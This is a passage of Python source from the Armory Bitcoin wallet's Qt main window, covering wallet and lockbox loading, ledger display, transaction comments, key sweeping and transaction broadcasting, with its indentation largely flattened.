else:
wltLoaded = False
LOGWARN('Second wallet is more useful than the first one...')
LOGWARN(' Wallet 1 (skipped): %s', fpath)
LOGWARN(' Wallet 2 (loaded): %s', self.walletMap[wltID].walletPath)
else:
# Update the maps/dictionaries
self.walletMap[wltID] = wltLoad
self.walletIndices[wltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(wltID)
self.walletIDList.append(wltID)
wtype = determineWalletType(wltLoad, self)[0]
notWatch = (not wtype == WLTTYPES.WatchOnly)
defaultVisible = self.getWltSetting(wltID, 'LedgerShow', notWatch)
self.walletVisibleList.append(defaultVisible)
wltLoad.mainWnd = self
if wltLoaded is False:
continue
except:
LOGEXCEPT( '***WARNING: Wallet could not be loaded: %s (skipping)',
fpath)
#raise
LOGINFO('Number of wallets read in: %d', len(self.walletMap))
for wltID, wlt in self.walletMap.iteritems():
dispStr = (' Wallet (%s):' % wlt.uniqueIDB58).ljust(25)
dispStr += '"'+wlt.labelName.ljust(32)+'" '
dispStr += '(Encrypted)' if wlt.useEncryption else '(No Encryption)'
LOGINFO(dispStr)
# Create one wallet per lockbox to make sure we can query individual
# lockbox histories easily.
if self.usermode==USERMODE.Expert:
LOGINFO('Loading Multisig Lockboxes')
self.loadLockboxesFromFile(MULTISIG_FILE)
# Get the last directory
savedDir = self.settings.get('LastDirectory')
if len(savedDir)==0 or not os.path.exists(savedDir):
savedDir = ARMORY_HOME_DIR
self.lastDirectory = savedDir
self.writeSetting('LastDirectory', savedDir)
updateProgress(100)
self.loadCppWallets()
#############################################################################
def loadCppWallets(self):
#load all existing cpp wallets
if self.walletManager == None:
self.walletManager = Cpp.WalletManager(str(ARMORY_HOME_DIR))
#check python wallets against cpp wallets
from ui.WalletMirrorDialog import WalletComparisonClass
wltCmpObj = WalletComparisonClass(self)
wltCmpObj.checkWallets()
#load all cpp wallets
for wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.cppWallet = self.walletManager.getCppWallet(wltID)
#############################################################################
@RemoveRepeatingExtensions
def getFileSave(self, title='Save Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultFilename=None):
LOGDEBUG('getFileSave')
startPath = self.settings.get('LastDirectory')
if len(startPath)==0 or not os.path.exists(startPath):
startPath = ARMORY_HOME_DIR
if not defaultFilename==None:
startPath = os.path.join(startPath, defaultFilename)
types = ffilter
types.append('All files (*)')
typesStr = ';; '.join(str(_type) for _type in types)
# Open the native file save dialog and grab the saved file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr))
else:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr,
options=QFileDialog.DontUseNativeDialog))
fdir,fname = os.path.split(fullPath)
if fdir:
self.writeSetting('LastDirectory', fdir)
return fullPath
#############################################################################
def getFileLoad(self, title='Load Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultDir=None):
LOGDEBUG('getFileLoad')
if defaultDir is None:
defaultDir = self.settings.get('LastDirectory')
if len(defaultDir)==0 or not os.path.exists(defaultDir):
defaultDir = ARMORY_HOME_DIR
types = list(ffilter)
types.append(self.tr('All files (*)'))
typeStr = QString("")
for i in range(0, len(types)):
_type = types[i]
typeStr += QString(_type)
if i < len(types) - 1:
typeStr += QString(";; ")
# Open the native file load dialog and grab the loaded file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr))
else:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr,
options=QFileDialog.DontUseNativeDialog))
self.writeSetting('LastDirectory', os.path.split(fullPath)[0])
return fullPath
##############################################################################
def getWltSetting(self, wltID, propName, defaultValue=''):
# Sometimes we need settings specific to individual wallets -- we will
# prefix the settings name with the wltID.
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
if self.settings.hasSetting(wltPropName):
return self.settings.get(wltPropName)
else:
if not defaultValue=='':
self.setWltSetting(wltID, propName, defaultValue)
return defaultValue
#############################################################################
def setWltSetting(self, wltID, propName, value):
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
self.writeSetting(wltPropName, value)
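# Example (wallet ID is hypothetical):
#    self.setWltSetting('3e7KaBQt', 'LedgerShow', True)
# persists under the settings key 'Wallet_3e7KaBQt_LedgerShow'.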
#############################################################################
def toggleIsMine(self, wltID):
alreadyMine = self.getWltSetting(wltID, 'IsMine')
if alreadyMine:
self.setWltSetting(wltID, 'IsMine', False)
else:
self.setWltSetting(wltID, 'IsMine', True)
#############################################################################
def loadLockboxesFromFile(self, fn):
self.allLockboxes = []
self.cppLockboxWltMap = {}
if not os.path.exists(fn):
return
lbList = readLockboxesFile(fn)
for lb in lbList:
self.updateOrAddLockbox(lb)
#############################################################################
def updateOrAddLockbox(self, lbObj, isFresh=False):
try:
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
# Add new lockbox to list
self.allLockboxes.append(lbObj)
self.lockboxIDMap[lbID] = len(self.allLockboxes)-1
else:
# Replace the original
self.allLockboxes[index] = lbObj
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
except:
LOGEXCEPT('Failed to add/update lockbox')
#############################################################################
def removeLockbox(self, lbObj):
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
LOGERROR('Tried to remove lockbox that DNE: %s', lbID)
else:
del self.allLockboxes[index]
self.reconstructLockboxMaps()
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
#############################################################################
def reconstructLockboxMaps(self):
self.lockboxIDMap.clear()
for i,box in enumerate(self.allLockboxes):
self.lockboxIDMap[box.uniqueIDB58] = i
#############################################################################
def getLockboxByID(self, boxID):
index = self.lockboxIDMap.get(boxID)
return None if index is None else self.allLockboxes[index]
################################################################################
# Get the lock box ID if the p2shAddrString is found in one of the lockboxes
# otherwise it returns None
def getLockboxByP2SHAddrStr(self, p2shAddrStr):
for lboxId in self.lockboxIDMap.keys():
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
if lbox.hasScrAddr(p2shAddrStr):
return lbox
return None
#############################################################################
def browseLockboxes(self):
self.lbDialog = DlgLockboxManager(self, self)
self.lbDialog.exec_()
self.lbDialog = None
#############################################################################
def getContribStr(self, binScript, contribID='', contribLabel=''):
"""
This is used to display info for the lockbox interface. It might also be
useful as a general script_to_user_string method, where you have a
binScript and you want to tell the user something about it. However,
it is verbose, so it won't fit in a send-confirm dialog, necessarily.
We should extract as much information as possible without contrib*. This
at least guarantees that we see the correct data for our own wallets
and lockboxes, even if the data for other parties is incorrect.
"""
displayInfo = self.getDisplayStringForScript(binScript, 60, 2)
if displayInfo['WltID'] is not None:
return displayInfo['String'], ('WLT:%s' % displayInfo['WltID'])
elif displayInfo['LboxID'] is not None:
return displayInfo['String'], ('LB:%s' % displayInfo['LboxID'])
scriptType = getTxOutScriptType(binScript)
# At this point, we can use the contrib ID (and know we can't sign it)
if contribID or contribLabel:
if contribID:
if contribLabel:
outStr = self.tr('Contributor "%1" (%2)').arg(contribLabel, contribID)
else:
outStr = self.tr('Contributor %1').arg(contribID)
else:
if contribLabel:
outStr = self.tr('Contributor "%1"').arg(contribLabel)
else:
outStr = self.tr('Unknown Contributor')
LOGERROR('How did we get to this impossible else-statement?')
return outStr, ('CID:%s' % contribID)
# If no contrib ID, then salvage anything
astr = displayInfo['AddrStr']
cid = None
if scriptType == CPP_TXOUT_MULTISIG:
M,N,a160s,pubs = getMultisigScriptInfo(binScript)
dispStr = 'Unrecognized Multisig %d-of-%d: P2SH=%s' % (M,N,astr)
cid = 'MS:%s' % astr
elif scriptType == CPP_TXOUT_P2SH:
dispStr = 'Unrecognized P2SH: %s' % astr
cid = 'P2SH:%s' % astr
elif scriptType in CPP_TXOUT_HAS_ADDRSTR:
dispStr = 'Address: %s' % astr
cid = 'ADDR:%s' % astr
else:
dispStr = 'Non-standard: P2SH=%s' % astr
cid = 'NS:%s' % astr
return dispStr, cid
#############################################################################
def getWalletForAddr160(self, addr160):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(addr160):
return wltID
return ''
#############################################################################
def getWalletForScrAddr(self, scrAddr):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(scrAddr):
return wltID
return ''
#############################################################################
def getSettingOrSetDefault(self, settingName, defaultVal):
s = self.settings.getSettingOrSetDefault(settingName, defaultVal)
return s
#############################################################################
def writeSetting(self, settingName, val):
self.settings.set(settingName, val)
# NB: armoryd has a similar function (Armory_Daemon::start()), and both share
# common functionality in ArmoryUtils (finishLoadBlockchainCommon). If you
# mod this function, please be mindful of what goes where, and make sure
# any critical functionality makes it into armoryd.
def finishLoadBlockchainGUI(self):
# Let's populate the wallet info after finishing loading the blockchain.
self.setDashboardDetails()
self.memPoolInit = True
self.createCombinedLedger()
self.ledgerSize = len(self.combinedLedger)
self.statusBar().showMessage(self.tr('Blockchain loaded, wallets sync\'d!'), 10000)
currSyncSuccess = self.getSettingOrSetDefault("SyncSuccessCount", 0)
self.writeSetting('SyncSuccessCount', min(currSyncSuccess+1, 10))
if self.getSettingOrSetDefault('NotifyBlkFinish',True):
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Info,
self.tr('Blockchain Loaded!'), self.tr('Blockchain loading is complete. '
'Your balances and transaction history are now available '
'under the "Transactions" tab. You can also send and '
'receive bitcoins.'), dnaaMsg=self.tr('Do not show me this notification again '), yesStr='OK')
if remember==True:
self.writeSetting('NotifyBlkFinish',False)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
self.netMode = NETWORKMODE.Full
self.settings.set('FailedLoadCount', 0)
# This will force the table to refresh with new data
self.removeBootstrapDat() # if we got here, we're *really* done with it
self.walletModel.reset()
qLen = self.delayedURIData['qLen']
if qLen > 0:
#delayed URI parses, feed them back to the uri parser now
for i in range(0, qLen):
uriStr = self.delayedURIData[qLen-i-1]
self.delayedURIData['qLen'] = qLen -i -1
self.uriLinkClicked(uriStr)
#############################################################################
def removeBootstrapDat(self):
bfile = os.path.join(BTC_HOME_DIR, 'bootstrap.dat.old')
if os.path.exists(bfile):
os.remove(bfile)
#############################################################################
def changeLedgerSorting(self, col, order):
"""
The direct sorting was implemented to avoid having to search for comment
information for every ledger entry. Therefore, you can't sort by comments
without getting them first, which is the original problem to avoid.
"""
if col in (LEDGERCOLS.NumConf, LEDGERCOLS.DateStr, \
LEDGERCOLS.Comment, LEDGERCOLS.Amount, LEDGERCOLS.WltName):
self.sortLedgCol = col
self.sortLedgOrder = order
self.createCombinedLedger()
#############################################################################
def createCombinedLedger(self, resetMainLedger=False):
"""
Create a ledger to display on the main screen, that consists of ledger
entries of any SUBSET of available wallets.
"""
bdmState = TheBDM.getState()
self.combinedLedger = []
totalFunds = 0
spendFunds = 0
unconfFunds = 0
if bdmState == BDM_BLOCKCHAIN_READY:
for wltID in self.wltIDList:
wlt = self.walletMap[wltID]
totalFunds += wlt.getBalance('Total')
spendFunds += wlt.getBalance('Spendable')
unconfFunds += wlt.getBalance('Unconfirmed')
self.ledgerSize = len(self.combinedLedger)
# Many MainWindow objects haven't been created yet...
# let's try to update them and fail silently if they don't exist
try:
if bdmState in (BDM_OFFLINE, BDM_SCANNING):
self.lblTotalFunds.setText( '-'*12 )
self.lblSpendFunds.setText( '-'*12 )
self.lblUnconfFunds.setText('-'*12 )
return
uncolor = htmlColor('MoneyNeg') if unconfFunds>0 else htmlColor('Foreground')
btccolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('MoneyPos')
lblcolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('Foreground')
goodColor= htmlColor('TextGreen')
self.lblTotalFunds.setText('<b><font color="%s">%s</font></b>' % (btccolor,coin2str(totalFunds)))
self.lblTot.setText(self.tr('<b><font color="%1">Maximum Funds:</font></b>').arg(lblcolor))
self.lblBTC1.setText('<b><font color="%s">BTC</font></b>' % lblcolor)
self.lblSpendFunds.setText('<b><font color=%s>%s</font></b>' % (goodColor, coin2str(spendFunds)))
self.lblUnconfFunds.setText(('<b><font color="%s">%s</font></b>' % \
(uncolor, coin2str(unconfFunds))))
         if not resetMainLedger:
self.ledgerModel.reset()
else:
self.ledgerView.goToTop()
      except AttributeError:
         # Widgets may not exist yet during startup; nothing to update
         pass
if not self.usermode==USERMODE.Expert:
return
# In expert mode, we're updating the lockbox info, too
try:
self.lockboxLedgModel.reset()
except:
LOGEXCEPT('Failed to update lockbox ledger')
#############################################################################
def getCommentForLockboxTx(self, lboxId, le):
commentSet = set([])
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
for a160 in lbox.a160List:
wltID = self.getWalletForAddr160(a160)
if wltID:
commentSet.add(self.walletMap[wltID].getCommentForLE(le))
return ' '.join(commentSet)
#############################################################################
def convertLedgerToTable(self, ledger, showSentToSelfAmt=True, wltIDIn=None):
table2D = []
datefmt = self.getPreferredDateFormat()
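      # Each row built below mirrors the LEDGERCOLS layout consumed by the
      # views: [nConf, unixTime, dateStr, signed amount str, wallet name,
      # comment, amount str, watch-only flag, wallet/lockbox ID, tx hash hex,
      # isCoinbase, isSentToSelf, isOptInRBF, isChainedZC]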
for le in ledger:
if wltIDIn is None:
wltID = le.getWalletID()
else:
wltID = wltIDIn
row = []
wlt = self.walletMap.get(wltID)
if wlt:
isWatch = (determineWalletType(wlt, self)[0] == WLTTYPES.WatchOnly)
wltName = wlt.labelName
dispComment = self.getCommentForLE(le, wltID)
else:
lboxId = wltID
lbox = self.getLockboxByID(lboxId)
if not lbox:
continue
isWatch = True
wltName = '%s-of-%s: %s (%s)' % (lbox.M, lbox.N, lbox.shortName, lboxId)
dispComment = self.getCommentForLockboxTx(lboxId, le)
nConf = TheBDM.getTopBlockHeight() - le.getBlockNum()+1
if le.getBlockNum()>=0xffffffff:
nConf=0
# If this was sent-to-self... we should display the actual specified
# value when the transaction was executed. This is pretty difficult
# when both "recipient" and "change" are indistinguishable... but
         # they're actually not, because we ALWAYS generate a new address
         # for change, which means the change address MUST have a higher
         # chain index
amt = le.getValue()
#if le.isSentToSelf() and wlt and showSentToSelfAmt:
#amt = determineSentToSelfAmt(le, wlt)[0]
# NumConf
row.append(nConf)
# UnixTime (needed for sorting)
row.append(le.getTxTime())
# Date
row.append(unixTimeToFormatStr(le.getTxTime(), datefmt))
# TxDir (actually just the amt... use the sign of the amt to determine dir)
row.append(coin2str(le.getValue(), maxZeros=2))
# Wlt Name
row.append(wltName)
# Comment
         if le.isOptInRBF():
if le.getValue() < 0 or le.isSentToSelf():
dispComment = self.tr("*Right click to bump fee* ") + dispComment
else:
dispComment = self.tr("*** RBF Flagged *** ") + dispComment
         elif le.isChainedZC():
dispComment = self.tr("*** Chained ZC *** ") + dispComment
row.append(dispComment)
# Amount
row.append(coin2str(amt, maxZeros=2))
# Is this money mine?
row.append(isWatch)
# ID to display (this might be the lockbox ID)
row.append( wltID )
# TxHash
row.append( binary_to_hex(le.getTxHash() ))
# Is this a coinbase/generation transaction
row.append( le.isCoinbase() )
# Sent-to-self
row.append( le.isSentToSelf() )
# RBF and zc chain status
row.append( le.isOptInRBF() )
row.append(le.isChainedZC())
# Finally, attach the row to the table
table2D.append(row)
return table2D
#############################################################################
def walletListChanged(self):
self.walletModel.reset()
self.populateLedgerComboBox()
self.changeWltFilter()
#############################################################################
def populateLedgerComboBox(self):
try:
comboIdx = self.comboWltSelect.currentIndex()
if comboIdx < 0:
            raise ValueError('no wallet filter selected yet')
except:
comboIdx = self.getSettingOrSetDefault('LastFilterState', 0)
self.comboWltSelect.clear()
self.comboWltSelect.addItem( self.tr('My Wallets' ))
self.comboWltSelect.addItem( self.tr('Offline Wallets' ))
self.comboWltSelect.addItem( self.tr('Other\'s wallets' ))
self.comboWltSelect.addItem( self.tr('All Wallets' ))
self.comboWltSelect.addItem( self.tr('Custom Filter' ))
for wltID in self.walletIDList:
self.comboWltSelect.addItem( self.walletMap[wltID].labelName )
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.setCurrentIndex(comboIdx)
#############################################################################
def execDlgWalletDetails(self, index=None):
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'),
self.tr('You currently do not have any wallets. Would you like to '
'create one, now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
      if index is None:
index = self.walletsView.selectedIndexes()
if len(self.walletMap)==1:
self.walletsView.selectRow(0)
index = self.walletsView.selectedIndexes()
elif len(index)==0:
QMessageBox.warning(self, self.tr('Select a Wallet'), \
self.tr('Please select a wallet on the right, to see its properties.'), QMessageBox.Ok)
return
index = index[0]
wlt = self.walletMap[self.walletIDList[index.row()]]
dialog = DlgWalletDetails(wlt, self.usermode, self, self)
self.walletDialogDict[wlt.uniqueIDB58] = dialog
dialog.exec_()
if wlt.uniqueIDB58 in self.walletDialogDict:
del self.walletDialogDict[wlt.uniqueIDB58]
#############################################################################
def execClickRow(self, index=None):
row,col = index.row(), index.column()
if not col==WLTVIEWCOLS.Visible:
return
wltID = self.walletIDList[row]
currEye = self.walletVisibleList[row]
self.walletVisibleList[row] = not currEye
self.setWltSetting(wltID, 'LedgerShow', not currEye)
if TheBDM.getState()==BDM_BLOCKCHAIN_READY:
self.changeWltFilter()
#############################################################################
def updateTxCommentFromView(self, view):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, LEDGERCOLS.Comment).data().toString())
wltID = str(view.model().index(row, LEDGERCOLS.WltID ).data().toString())
txHash = str(view.model().index(row, LEDGERCOLS.TxHash ).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Transaction Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Transaction Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
view.model().updateIndexComment(index, newComment)
self.walletMap[wltID].setComment(hex_to_binary(txHash), newComment)
self.walletListChanged()
#############################################################################
def updateAddressCommentFromView(self, view, wlt):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, ADDRESSCOLS.Comment).data().toString())
addrStr = str(view.model().index(row, ADDRESSCOLS.Address).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Address Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Address Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
atype, addr160 = addrStr_to_hash160(addrStr)
if atype==P2SHBYTE:
LOGWARN('Setting comment for P2SH address: %s' % addrStr)
wlt.setComment(addr160, newComment)
#############################################################################
def getAddrCommentIfAvailAll(self, txHash):
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
return ''
else:
appendedComments = []
for wltID,wlt in self.walletMap.iteritems():
cmt = wlt.getAddrCommentIfAvail(txHash)
if len(cmt)>0:
appendedComments.append(cmt)
return '; '.join(appendedComments)
#############################################################################
def getCommentForLE(self, le, wltID=None):
# Smart comments for LedgerEntry objects: get any direct comments ...
# if none, then grab the one for any associated addresses.
if wltID is None:
wltID = le.getWalletID()
return self.walletMap[wltID].getCommentForLE(le)
#############################################################################
def addWalletToApplication(self, newWallet, walletIsNew=False):
LOGINFO('addWalletToApplication')
# Update the maps/dictionaries
newWltID = newWallet.uniqueIDB58
if self.walletMap.has_key(newWltID):
return
self.walletMap[newWltID] = newWallet
self.walletIndices[newWltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(newWltID)
self.walletIDList.append(newWltID)
self.loadCppWallets()
newWallet.registerWallet(walletIsNew)
showByDefault = (determineWalletType(newWallet, self)[0] != WLTTYPES.WatchOnly)
self.walletVisibleList.append(showByDefault)
self.setWltSetting(newWltID, 'LedgerShow', showByDefault)
self.walletListChanged()
self.mainWnd = self
#############################################################################
def removeWalletFromApplication(self, wltID):
LOGINFO('removeWalletFromApplication')
idx = -1
try:
idx = self.walletIndices[wltID]
except KeyError:
LOGERROR('Invalid wallet ID passed to "removeWalletFromApplication"')
raise WalletExistsError
#self.walletMap[wltID].unregisterWallet()
del self.walletMap[wltID]
del self.walletIndices[wltID]
self.walletIDSet.remove(wltID)
del self.walletIDList[idx]
del self.walletVisibleList[idx]
# Reconstruct walletIndices
for i,wltID in enumerate(self.walletIDList):
self.walletIndices[wltID] = i
self.walletListChanged()
#############################################################################
def RecoverWallet(self):
DlgWltRecoverWallet(self, self).promptWalletRecovery()
#############################################################################
def createSweepAddrTx(self, sweepFromAddrObjList, sweepToScript):
"""
This method takes a list of addresses (likely just created from private
key data), finds all their unspent TxOuts, and creates a signed tx that
      transfers 100% of the funds to the sweepToScript output. It doesn't
actually execute the transaction, but it will return a broadcast-ready
PyTx object that the user can confirm. TxFee is automatically calc'd
and deducted from the output value, if necessary.
"""
LOGINFO('createSweepAddrTx')
if not isinstance(sweepFromAddrObjList, (list, tuple)):
sweepFromAddrObjList = [sweepFromAddrObjList]
addr160List = [a.getAddr160() for a in sweepFromAddrObjList]
utxoList = getUnspentTxOutsForAddr160List(addr160List)
if len(utxoList)==0:
return [None, 0, 0]
outValue = sumTxOutList(utxoList)
inputSide = []
for utxo in utxoList:
         # The PyCreateAndSignTx method requires PyTx and PyBtcAddress objects
rawTx = TheBDM.bdv().getTxByHash(utxo.getTxHash()).serialize()
a160 = CheckHash160(utxo.getRecipientScrAddr())
for aobj in sweepFromAddrObjList:
if a160 == aobj.getAddr160():
pubKey = aobj.binPublicKey65.toBinStr()
pubKeyMap = {}
pubKeyMap[ADDRBYTE + a160] = pubKey
txoIdx = utxo.getTxOutIndex()
inputSide.append(UnsignedTxInput(rawTx, txoIdx, None, pubKeyMap))
break
minFee = calcMinSuggestedFees(utxoList, outValue, 0, 1)
if minFee > 0:
LOGDEBUG( 'Subtracting fee from Sweep-output')
outValue -= minFee
if outValue<=0:
return [None, outValue, minFee]
# Creating the output list is pretty easy...
outputSide = []
outputSide.append(DecoratedTxOut(sweepToScript, outValue))
try:
# Make copies, destroy them in the finally clause
privKeyMap = {}
for addrObj in sweepFromAddrObjList:
scrAddr = ADDRBYTE + addrObj.getAddr160()
privKeyMap[scrAddr] = addrObj.binPrivKey32_Plain.copy()
pytx = PyCreateAndSignTx(inputSide, outputSide, privKeyMap)
return (pytx, outValue, minFee)
finally:
for scraddr in privKeyMap:
privKeyMap[scraddr].destroy()
#############################################################################
def confirmSweepScan(self, pybtcaddrList, targAddr160):
LOGINFO('confirmSweepScan')
gt1 = len(self.sweepAfterScanList)>1
if len(self.sweepAfterScanList) > 0:
QMessageBox.critical(self, self.tr('Already Sweeping'),
self.tr('You are already in the process of scanning the blockchain for '
'the purposes of sweeping other addresses. You cannot initiate '
'sweeping new addresses until the current operation completes. '
'<br><br>'
'In the future, you may select "Multiple Keys" when entering '
'addresses to sweep. There is no limit on the number that can be '
'specified, but they must all be entered at once.'), QMessageBox.Ok)
# Destroy the private key data
for addr in pybtcaddrList:
addr.binPrivKey32_Plain.destroy()
return False
confirmed=False
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
#LOGERROR('Somehow ended up at confirm-sweep while in offline mode')
#QMessageBox.info(self, 'Armory is Offline', \
#'Armory is currently in offline mode. You must be in online '
#'mode to initiate the sweep operation.')
         nkey = len(pybtcaddrList)
strPlur = self.tr('addresses') if nkey>1 else self.tr('address')
         QMessageBox.information(self, self.tr('Armory is Offline'), \
self.tr('You have chosen to sweep %n key(s), but Armory is currently '
'in offline mode. The sweep will be performed the next time you '
'go into online mode. You can initiate online mode (if available) '
'from the dashboard in the main window.', "", nkey), QMessageBox.Ok)
confirmed=True
else:
msgConfirm = ( \
self.tr('Armory must scan the global transaction history in order to '
'find any bitcoins associated with the keys you supplied. '
'Armory will go into offline mode temporarily while the scan '
'is performed, and you will not have access to balances or be '
'able to create transactions. The scan may take several minutes.'
            '<br><br>', "", len(pybtcaddrList)))
if TheBDM.getState()==BDM_SCANNING:
msgConfirm += ( \
self.tr('There is currently another scan operation being performed. '
'Would you like to start the sweep operation after it completes? '))
elif TheBDM.getState()==BDM_BLOCKCHAIN_READY:
msgConfirm += ( \
self.tr('<b>Would you like to start the scan operation right now?</b>'))
msgConfirm += (self.tr('<br><br>Clicking "No" will abort the sweep operation'))
confirmed = QMessageBox.question(self, self.tr('Confirm Rescan'), msgConfirm, \
QMessageBox.Yes | QMessageBox.No)
      if confirmed is True or confirmed == QMessageBox.Yes:
for addr in pybtcaddrList:
TheBDM.registerImportedScrAddr(Hash160ToScrAddr(addr.getAddr160()))
self.sweepAfterScanList = pybtcaddrList
self.sweepAfterScanTarg = targAddr160
self.setDashboardDetails()
return True
#############################################################################
def finishSweepScan(self, wlt, sweepList, sweepAfterScanTarget):
LOGINFO('finishSweepScan')
self.sweepAfterScanList = []
#######################################################################
      # The createSweepAddrTx method will return instantly because the
      # blockchain has already been rescanned, as described above
targScript = scrAddr_to_script(ADDRBYTE + sweepAfterScanTarget)
finishedTx, outVal, fee = self.createSweepAddrTx(sweepList, targScript)
gt1 = len(sweepList)>1
      if finishedTx is None:
if (outVal,fee)==(0,0):
QMessageBox.critical(self, self.tr('Nothing to do'), \
self.tr('The private key(s) you have provided does not appear to contain '
'any funds. There is nothing to sweep.', "", len(sweepList)), \
QMessageBox.Ok)
return
else:
pladdr = (self.tr('addresses') if gt1 else self.tr('address'))
QMessageBox.critical(self, self.tr('Cannot sweep'),\
self.tr('You cannot sweep the funds from the address(es) you specified because '
'the transaction fee would be greater than or equal to the amount '
'swept. '
'<br><br> '
'<b>Balance of address(es):</b> %1<br> '
'<b>Fee to sweep address(es):</b> %2 '
'<br><br>The sweep operation has been canceled.', "", len(sweepList)).arg(coin2str(outVal+fee,maxZeros=0), coin2str(fee,maxZeros=0)), \
QMessageBox.Ok)
LOGERROR('Sweep amount (%s) is less than fee needed for sweeping (%s)', \
coin2str(outVal+fee, maxZeros=0), coin2str(fee, maxZeros=0))
return
# Finally, if we got here, we're ready to broadcast!
if gt1:
dispIn = self.tr('multiple addresses')
else:
addrStr = hash160_to_addrStr(sweepList[0].getAddr160())
dispIn = self.tr('address <b>%1</b>').arg(addrStr)
dispOut = self.tr('wallet <b>"%1"</b> (%2) ').arg(wlt.labelName, wlt.uniqueIDB58)
if DlgVerifySweep(dispIn, dispOut, outVal, fee).exec_():
self.broadcastTransaction(finishedTx, dryRun=False)
#############################################################################
def notifyNewZeroConf(self, leVec):
'''
Function that looks at an incoming zero-confirmation transaction queue and
determines if any incoming transactions were created by Armory. If so, the
transaction will be passed along to a user notification queue.
'''
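      # Each queued entry below is [walletID, ledgerEntry, False]; the
      # trailing flag is presumably a "not yet displayed" marker handled by
      # the system-tray notification code (doTheSystemTrayThing)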
vlen = leVec.size()
for i in range(0, vlen):
notifyIn = self.getSettingOrSetDefault('NotifyBtcIn', \
not OS_MACOSX)
notifyOut = self.getSettingOrSetDefault('NotifyBtcOut', \
not OS_MACOSX)
le = leVec[i]
if (le.getValue() <= 0 and notifyOut) or \
(le.getValue() > 0 and notifyIn):
self.notifyQueue.append([le.getWalletID(), le, False])
self.doTheSystemTrayThing()
#############################################################################
def broadcastTransaction(self, pytx, dryRun=False):
if dryRun:
#DlgDispTxInfo(pytx, None, self, self).exec_()
return
else:
LOGRAWDATA(pytx.serialize(), logging.INFO)
LOGPPRINT(pytx, logging.INFO)
newTxHash = binary_to_hex(pytx.getHash())
self.broadcasting[newTxHash] = pytx
try:
LOGINFO('Sending Tx, %s', newTxHash)
TheBDM.bdv().broadcastZC(pytx.serialize())
except:
QMessageBox.warning(self, self.tr('Broadcast failed'), self.tr(
'The broadcast process failed unexpectedly. Report this error to '
            'the development team if this issue occurs repeatedly.'), QMessageBox.Ok)
#############################################################################
def zcBroadcastError(self, txHash, errorMsg):
try:
pytx = self.broadcasting[txHash]
except:
return
LOGINFO("Failed to broadcast Tx through P2P")
isTimeoutError = False
errorMsgFromRPC = None
if errorMsg.startswith("tx broadcast timed out"):
isTimeoutError = True
try:
errorMsgFromRPC = TheBDM.bdv().broadcastThroughRPC(pytx.serialize())
if errorMsgFromRPC == "success":
QMessageBox.warning(self, self.tr('Transaction Broadcast'), self.tr(
'Your Transaction failed to broadcast through the P2P layer but '
'successfully broadcasted through the RPC. This can be a symptom '
'of bad node connectivity to the Bitcoin network, or that your '
'node is overwhelmed by network traffic. If you consistently get '
'this warning, report to the developers for assistance with node '
'maintenance.'),
QMessageBox.Ok)
return
except:
LOGERROR("Node RPC is disabled")
LOGERROR('Transaction was not accepted by the Satoshi client')
LOGERROR('Raw transaction:')
LOGRAWDATA(pytx.serialize(), logging.ERROR)
LOGERROR('Transaction details')
LOGPPRINT(pytx, logging.ERROR)
LOGERROR('Failure message: %s' % (errorMsg))
searchstr = binary_to_hex(txHash, BIGENDIAN)
supportURL = 'https://github.com/goatpig/BitcoinArmory/issues'
blkexplURL = BLOCKEXPLORE_URL_TX % searchstr
blkexplURL_short = BLOCKEXPLORE_URL_TX % searchstr[:20]
if not isTimeoutError:
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just executed failed with '
'the following error message: <br><br> '
'<b>%1</b>'
'<br><br>'
            '<br><br>On timeout errors, the transaction may have actually succeeded '
            'and this message is displayed prematurely. To confirm whether '
            'the transaction actually succeeded, you can try this direct link '
'to %2: '
'<br><br>'
'<a href="%3">%4...</a>'
